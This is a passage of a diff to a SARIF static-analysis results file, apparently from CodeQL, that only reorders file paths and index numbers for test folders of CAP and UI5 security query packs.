".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uri" : ".github/codeql/codeql-config.yaml", "uriBaseId" : "%SRCROOT%", "index" : 8 } @@ -3256,7 +3256,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", "uriBaseId" : "%SRCROOT%", "index" : 11 } @@ -3282,7 +3282,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 12 } @@ -3490,7 +3490,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 20 } @@ -3516,7 +3516,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 21 } @@ -3542,7 +3542,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/src/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 22 } @@ -3724,7 +3724,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 29 } @@ -3750,7 +3750,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 30 } @@ -3880,7 +3880,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 35 } @@ -3906,7 +3906,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 36 } @@ -3984,7 +3984,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 39 } @@ -4010,7 +4010,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", "uriBaseId" : "%SRCROOT%", "index" : 40 } @@ -4088,7 +4088,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 43 } @@ -4114,7 +4114,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 44 } @@ -4166,7 +4166,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 46 } @@ -4192,7 +4192,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", "uriBaseId" : "%SRCROOT%", "index" : 47 } @@ -4218,7 +4218,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 48 } @@ -4244,7 +4244,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", "uriBaseId" : "%SRCROOT%", "index" : 49 } @@ -4270,7 +4270,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 50 } @@ -4296,7 +4296,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 51 } @@ -4322,7 +4322,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 52 } @@ -4478,7 +4478,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 58 } @@ -4504,7 +4504,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 59 } @@ -4582,7 +4582,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", "uriBaseId" : "%SRCROOT%", "index" : 62 } @@ -4608,7 +4608,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", "uriBaseId" : "%SRCROOT%", "index" : 63 } @@ -4686,7 +4686,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 66 } @@ -4712,7 +4712,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 67 } @@ -4816,7 +4816,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 71 } @@ -4842,7 +4842,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 72 } @@ -4868,7 +4868,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 73 } @@ -4894,7 +4894,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 74 } @@ -4920,7 +4920,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 75 } @@ -4946,7 +4946,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", "uriBaseId" : "%SRCROOT%", "index" : 76 } @@ -5050,7 +5050,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 80 } @@ -5076,9 +5076,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 1 + "index" : 81 } } } ], @@ -5102,9 +5102,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", "uriBaseId" : "%SRCROOT%", - "index" : 81 + "index" : 1 } } } ], @@ -5232,7 +5232,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 86 } @@ -5258,7 +5258,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 87 } @@ -5310,7 +5310,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 88 } @@ -5388,7 +5388,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 91 } @@ -5414,7 +5414,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 92 } @@ -5440,7 +5440,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 93 } @@ -5466,7 +5466,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 94 } @@ -5492,7 +5492,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 95 } @@ -5518,7 +5518,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 96 } @@ -5570,7 +5570,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", "index" : 98 } @@ -5596,7 +5596,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 99 } @@ -5622,7 +5622,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 100 } @@ -5648,7 +5648,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 101 } @@ -5674,7 +5674,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 102 } @@ -5700,7 +5700,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", "index" : 103 } @@ -5726,7 +5726,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 104 } @@ -5752,7 +5752,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 105 } @@ -5778,7 +5778,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 106 } @@ -5804,7 +5804,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 107 } @@ -5830,7 +5830,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 108 } @@ -5856,7 +5856,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 109 } @@ -5908,7 +5908,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 111 } @@ -5934,7 +5934,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 112 } @@ -5960,7 +5960,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 113 } @@ -5986,7 +5986,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 114 } @@ -6012,7 +6012,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 115 } @@ -6038,7 +6038,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 116 } @@ -6116,7 +6116,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 119 } @@ -6142,7 +6142,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 120 } @@ -6168,7 +6168,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 121 } @@ -6194,7 +6194,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", "uriBaseId" : "%SRCROOT%", "index" : 122 } @@ -6220,7 +6220,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", "uriBaseId" : "%SRCROOT%", "index" : 123 } @@ -6246,7 +6246,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", "uriBaseId" : "%SRCROOT%", "index" : 124 } @@ -6428,7 +6428,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 131 } @@ -6454,7 +6454,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 132 } @@ -6480,7 +6480,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", "uriBaseId" : "%SRCROOT%", "index" : 133 } @@ -6506,7 +6506,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", "uriBaseId" : "%SRCROOT%", "index" : 134 } @@ -7260,7 +7260,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 163 } @@ -7286,7 +7286,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 164 } @@ -7312,7 +7312,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 165 } @@ -7338,7 +7338,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 166 } @@ -7364,9 +7364,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", "uriBaseId" : "%SRCROOT%", - "index" : 167 + "index" : 3 } } } ], @@ -7390,9 +7390,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 168 + "index" : 167 } } } ], @@ -7416,9 +7416,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 3 + "index" : 168 } } } ], @@ -7572,7 +7572,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 174 } @@ -7598,7 +7598,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 175 } @@ -7624,7 +7624,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 176 } @@ -7676,7 +7676,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uri" : 